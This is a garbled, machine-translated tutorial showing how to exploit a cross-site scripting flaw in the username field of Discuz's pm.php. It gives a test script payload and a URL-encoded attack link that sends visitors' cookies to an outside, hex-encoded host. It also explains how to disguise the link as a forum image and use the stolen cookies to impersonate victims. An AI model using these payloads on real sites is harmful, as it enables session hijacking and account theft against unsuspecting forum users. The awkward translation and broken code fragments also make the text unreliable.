Cross-station scripting attack +cookies Spoofing (Discuz) _ Vulnerability Research

This time I take discuz demonstration to everybody, first we all knew, Discuz in Pm.php's program, did not have the

Member name to do filter, cause we can write some script.

Smart students, think of it? We can use this loophole to write a script to get cookies.

This is to look like the color will react! (taken from a math cram school = = ")

So first we get our cookies from this side ...

Example:

Http://www.abc.com/pm.php?action=send&username=, what are you looking at? ><script>alert (Documents.cookie) </script><

Ok? Next, we use a cross-platform approach in order to get someone else's cookies,

First of all, let the other party see our carefully-crafted URL. After that, we'll go to our PHP or ASP program.

And write the other's own cookies into our program ... (if necessary, please googles search for a bunch of mainland dogs) ...

So we get to the other cookies, we find our cookies in the forum record.

After you find it, change the information in the cookie to the user name and the encrypted MD5 code ...

Remember MD5 code is not to reverse the ~

Now I finish the principle ㄌ ... Come on, you little bastard!

We already know the pm.php bug. We have also uploaded the PHP program to complete it.

Next we go to the forum to send link! P.S. Some forums can also use Avatar to deceive ...

All look at the individual's thinking .... (Think of maths teacher ㄌ= = ")

I posted a link to a computer-related article and attached a picture ... (hehe emphasis in picture pull ~)

I'm assuming there's a fake URL, http://myweb.hinet.net/uarestupid/home1/XXX.jpg.

You can write as long as it looks like a picture link is enough ....

and add http://myweb.hinet.net/uarestupid/home1/XXX.jpg to our vulnerability,

So that's what it looks like:

Http://myweb.hinet.net/uarestupid/home1/XXX.jpg

The above picture link looks like everybody regardless of thought that really is the picture ...

actually connected to,

Http://www.abc.com/pm.php?action=send&username=fuck%22%3E%3Cscript%3Ewindow.open ("%68%74%74%70%3a%2f%2f%6d %65%6d%62%65%72%73%2e%6c%79%63%6f%73%2e%63%6f%2e%75%6b%2f%6a%65%72%65%6d%79%68%63%77%2f%68%2e%70%68%70? " %2bdocuments.cookie)%3c/script%3e%3cb%22

I have already encoded the URL above, diligent students to use cookies to search it ...

So he pressed the picture to connect .... Send out your cookies = "but he can still see the picture ...